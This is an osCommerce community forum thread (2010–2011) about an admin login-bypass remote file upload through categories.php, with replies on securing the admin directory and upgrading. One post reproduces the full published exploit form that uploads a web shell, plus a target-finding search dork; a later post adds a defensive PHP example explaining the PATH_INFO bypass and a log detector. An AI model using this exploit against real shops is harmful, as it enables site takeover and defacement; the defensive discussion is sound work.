
New exploit TODAY is out !


12 replies to this topic

#1 pamamolf

  • Community Member
  • 22 posts
  • Real Name:Dimitris

Posted 20 November 2010, 23:12

Is there any fix for the new exploit that is out today?

oscommerce remote upload from categories.php

?

#2 tigergirl

  • Community Member
  • 423 posts
  • Real Name:Tigergirl
  • Gender:Not Telling
  • Location:UK

Posted 20 November 2010, 23:37

I think this has already been discussed - htaccess of the admin folder etc etc

I could be wrong and no doubt if I am I'm sure if this is a new exploit some of the php gurus will soon have something to say.....
I'm feeling lucky today......maybe someone will answer my post!
I do try and answer a simple post when I can just to give something back.
------------------------------------------------
PM me? - I'm not for hire

#3 DunWeb

  • Community Sponsor
  • 10,464 posts
  • Real Name:Chris Dunn
  • Gender:Male
  • Location:Tecumseh, Ontario, Canada N8N 1X8

Posted 21 November 2010, 01:48

It is an OLD exploit using file_manager.php and define_language.php. REMOVE those files from the admin directory, the languages directory and also remove the link from tools.php.


Refer to this thread for more information:

Admin Security



Chris

Edited by DunWeb, 21 November 2010, 01:48.

:|: Was this post helpful ? Click the LIKE THIS button :|:

:|: Click Here to learn how I can help you with custom coding, add ons, security and templates :|:

:|: Need an Area Calculator, Pre-Paid Account, Virtual Pin, Auction or Layaway Add on ? Click Here :|:

#4 pamamolf

  • Community Member
  • 22 posts
  • Real Name:Dimitris

Posted 21 November 2010, 07:20

No this is a new exploit and is using the categories.php.

#5 firstbizsoft

  • Community Member
  • 44 posts
  • Real Name:costel croitoru
  • Gender:Male
  • Location:olula del rio almeria spain

Posted 21 November 2010, 11:25

Hi there,
this is the new exploit, he was published today:

oscommerce remote upload from categories.php

# Exploit Title: [oscommerce remote upload from categories.php]
# Google Dork: ["powered by oscommerce"]
# Date: [20-November-2010]
# Author: [Number 7]
#Contact: {an[dot]7[at]live[dot]fr}
# Software Link: [http://www.oscommerce.com/solutions/downloads]
# Tested on: [windows-linux-FreeBSD-Solaris]

exploit:

<html>
<head>
<title>Download</title>
</head>
<body>
<div style="text-align: center;"><big
style="color: rgb(253, 0, 0);"><big><big>Discovered
By Number 7<br>
</big></big></big><span
style="color: rgb(102, 102, 102);">(best defacer kairouan
tunisia 2010)</span><br>
</div>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>Oscommerce
script: Remote File Upload in /admin/Categories.php</big></big><br>
<?php $host ="site";
$path ="ath";
?>
<form name="new_product"
action="http://<?php echo $host;echo $path; ?>/admin/categories.php/login.php?cPath=&action=new_product_preview"
method="post" enctype="multipart/form-data"><br>
<input name="products_image" type="file"><br>
<input name="submit" value=" Save " type="submit"><br>
<big style="font-weight: bold; color: rgb(253, 0, 0);"><big>shell
here:</big></big><br>
<?php echo ("Using upload File : <a href=http://$host/$path/images/product_info.php>$host/</>$path</>/images/product_info.php</a></font></body>");
?></form>
</body>
</html>

[~] Greetz tO: [Meher-Assel(Net-Own3r#Shichemt-Älen#Sami(s-man)#zone-h/crew#all tunisian hackers]
[~] Home :info-geek.com/ # v4-team.com/cc/

#6 mdtaylorlrim

  • Community Member
  • 2,497 posts
  • Real Name:Mark
  • Gender:Male

Posted 21 November 2010, 11:32

firstbizsoft, on 21 November 2010, 11:25, said:


this is the new exploit, he was published today:

action="http://<?php echo $host;echo $path; ?>/admin/categories.php/login.php?cPath=&action=new_product_preview"

HE may have found it, but it has been addressed before. The exploit uses an unsecured "admin" directory (see the action line above). If you have secured the admin directory and changed its name then this exploit will fail.
Avoid the most asked question. See How to Secure My Site and How do I...?

#7 firstbizsoft

  • Community Member
  • 44 posts
  • Real Name:costel croitoru
  • Gender:Male
  • Location:olula del rio almeria spain

Posted 21 November 2010, 11:36

Yes, that's right. "If you have secured the admin directory and changed its name then this exploit will fail." It works too if you don't change the admin directory name.

#8 mamatemplate

  • Community Member
  • 9 posts
  • Real Name:stefan

Posted 26 March 2011, 01:45

It's pointless to install any osc site without a minimum of security measures; out there are robots able to hack any unsecured osc site ten times any single day. I suggest securing first and installing after.

#9 Xpajun

  • Community Member
  • 1,272 posts
  • Real Name:Julian
  • Gender:Male
  • Location:UK

Posted 26 March 2011, 08:30

mamatemplate, on 26 March 2011, 01:45, said:

It's pointless to install any osc site without a minimum of security measures; out there are robots able to hack any unsecured osc site ten times any single day. I suggest securing first and installing after.

It is pointless to install ANY website without security measures

In these forums we tend to focus too much on the vulnerability of osC, all unprotected sites are vulnerable not just osC - like you know that blog you visited just before you logged into your osC admin or was it a forum like this? - Did you check your computer for viruses before logging in to your admin after, or did you rely on your anti virus catcher?

Being the webmaster of a site is really no different than being a surgeon in an operating theatre - you need to scrub up before entering

Edited by Xpajun, 26 March 2011, 08:31.


#10 yesudo

  • Community Member
  • 3,376 posts
  • Real Name:Emmett Brosnan
  • Gender:Male
  • Location:London, England

Posted 08 April 2011, 22:45

This hack exploits the PHP basename function in admin directories where htaccess is not used to control logins. The code in admin/includes/application_top.php can be amended to stop this hack - but the safest solution, as mentioned above, is to use htaccess in the admin directory.
Your online success is Paramount.
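The weakness the post above names (a login-page check built on basename() of PHP_SELF, which still contains PATH_INFO) can be shown in a few lines. The following is an added PHP 7+ example, not osCommerce's own application_top.php code; the constant, function names, the sample request environments and the access-log lines are all constructed for illustration. It puts a model of the weak check next to a hardened one that uses SCRIPT_NAME and rejects PATH_INFO outright, and adds a small log-side detector for request paths of the form admin/...php/...php that the exploit's form action relies on:

```php
<?php
// Added example (not osCommerce's code): why basename(PHP_SELF) is bypassable
// via PATH_INFO, a check that is not, and a detector for the request pattern.
// Assumption: the admin login script is named login.php, as in the thread.

const LOGIN_FILENAME = 'login.php';

// Model of the weak check: "is the current script the login page?"
// PHP_SELF = SCRIPT_NAME + PATH_INFO, so /admin/categories.php/login.php
// ends in login.php and is mistaken for the login page.
function weakIsLoginPage(array $server): bool
{
    return basename($server['PHP_SELF']) === LOGIN_FILENAME;
}

// Hardened check: SCRIPT_NAME names the script actually executed and never
// carries PATH_INFO. Admin scripts take no path parameters, so any request
// that arrives with PATH_INFO is refused the login-page exemption as well.
function hardenedIsLoginPage(array $server): bool
{
    if (!empty($server['PATH_INFO'])) {
        return false;
    }
    return basename($server['SCRIPT_NAME']) === LOGIN_FILENAME;
}

// Authentication gate: the request may proceed without an admin session only
// if the chosen check says this really is the login page.
function allowedWithoutSession(array $server, bool $sessionHasAdmin, callable $isLoginPage): bool
{
    return $sessionHasAdmin || $isLoginPage($server);
}

// Log-side detection: flag request paths under the admin directory that carry
// a ".php/" segment, i.e. a PHP script followed by PATH_INFO.
function isPathInfoBypassAttempt(string $requestTarget, string $adminDir = '/admin/'): bool
{
    $path = (string) parse_url($requestTarget, PHP_URL_PATH);   // drop the query string
    if (strpos($path, $adminDir) !== 0) {
        return false;
    }
    return (bool) preg_match('#\.php/[^\s?]+#i', $path);
}

// Constructed request environments, as Apache/mod_php would populate them.
$bypassRequest = [
    'SCRIPT_NAME' => '/admin/categories.php',
    'PATH_INFO'   => '/login.php',
    'PHP_SELF'    => '/admin/categories.php/login.php',
];
$genuineLogin = [
    'SCRIPT_NAME' => '/admin/login.php',
    'PATH_INFO'   => '',
    'PHP_SELF'    => '/admin/login.php',
];

// The weak check exempts the unauthenticated upload request from login; the
// hardened check does not, while still letting the real login page through.
foreach (['weakIsLoginPage', 'hardenedIsLoginPage'] as $check) {
    printf("%-20s bypass request allowed without session: %s\n", $check,
        allowedWithoutSession($bypassRequest, false, $check) ? 'yes' : 'no');
    printf("%-20s genuine login allowed without session:  %s\n", $check,
        allowedWithoutSession($genuineLogin, false, $check) ? 'yes' : 'no');
}

// Constructed access-log lines run through the detector.
$logLines = [
    '203.0.113.5 - - [20/Nov/2010:23:00:01 +0000] "POST /admin/categories.php/login.php?cPath=&action=new_product_preview HTTP/1.1" 200 512',
    '198.51.100.7 - - [20/Nov/2010:23:00:02 +0000] "GET /admin/categories.php?cPath=1 HTTP/1.1" 302 0',
    '198.51.100.9 - - [20/Nov/2010:23:00:03 +0000] "GET /product_info.php/extra HTTP/1.1" 200 1024',
];
foreach ($logLines as $line) {
    if (preg_match('/"(?:GET|POST) (\S+) HTTP/', $line, $m) && isPathInfoBypassAttempt($m[1])) {
        echo "suspicious admin request: {$m[1]}\n";
    }
}
```

Only the first log line is flagged: the second has no PATH_INFO and the third is outside the admin directory. The hardened check is a code-level complement to, not a replacement for, the .htaccess protection of the admin directory recommended throughout this thread, which stops the request before any PHP runs.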

#11 Mark Evans

  • Team Member
  • 2,428 posts
  • Real Name:Mark
  • Gender:Male
  • Location:Behind you :-P

Posted 09 April 2011, 07:28

Or just upgrade to 2.3.1 where this exploit isn't possible
Mark Evans
osCommerce Monkey & Lead Guitarist for "Sparky + the Monkeys" (Album on sale in all good record shops)

---------------------------------------
Software is like sex: It's better when it's free. (Linus Torvalds)

#12 sucuri

  • Community Member
  • 27 posts
  • Real Name:sucuri

Posted 09 April 2011, 11:27

Completely agree. It is not only oscommerce that is targeted... WordPress, Joomla, Drupal and even custom sites, if not secured, will be attacked (and probably hacked).



Xpajun, on 26 March 2011, 08:30, said:

It is pointless to install ANY website without security measures

In these forums we tend to focus too much on the vulnerability of osC, all unprotected sites are vulnerable not just osC - like you know that blog you visited just before you logged into your osC admin or was it a forum like this? - Did you check your computer for viruses before logging in to your admin after, or did you rely on your anti virus catcher?

Being the webmaster of a site is really no different than being a surgeon in an operating theatre - you need to scrub up before entering


#13 Taipo

  • Community Member
  • 751 posts
  • Real Name:Te Taipo
  • Gender:Male

Posted 09 April 2011, 12:05

The best thing you can do for your web content is keep your site up to date with the latest code. That is the most secure practice albeit not always the easiest thing to do.
- Stop Oscommerce hacks dead in their tracks with osC_Sec (see discussion here)
- Another discussion about infected files ::here::
- A discussion on file permissions ::here::
- Site hacked? Should you upgrade or not, some thoughts ::here::
- Ignore this link - just a honeypot site to test my ideas out for osC_Sec and allow the site to be picked up by attackers.
- Fix the admin login bypass exploit here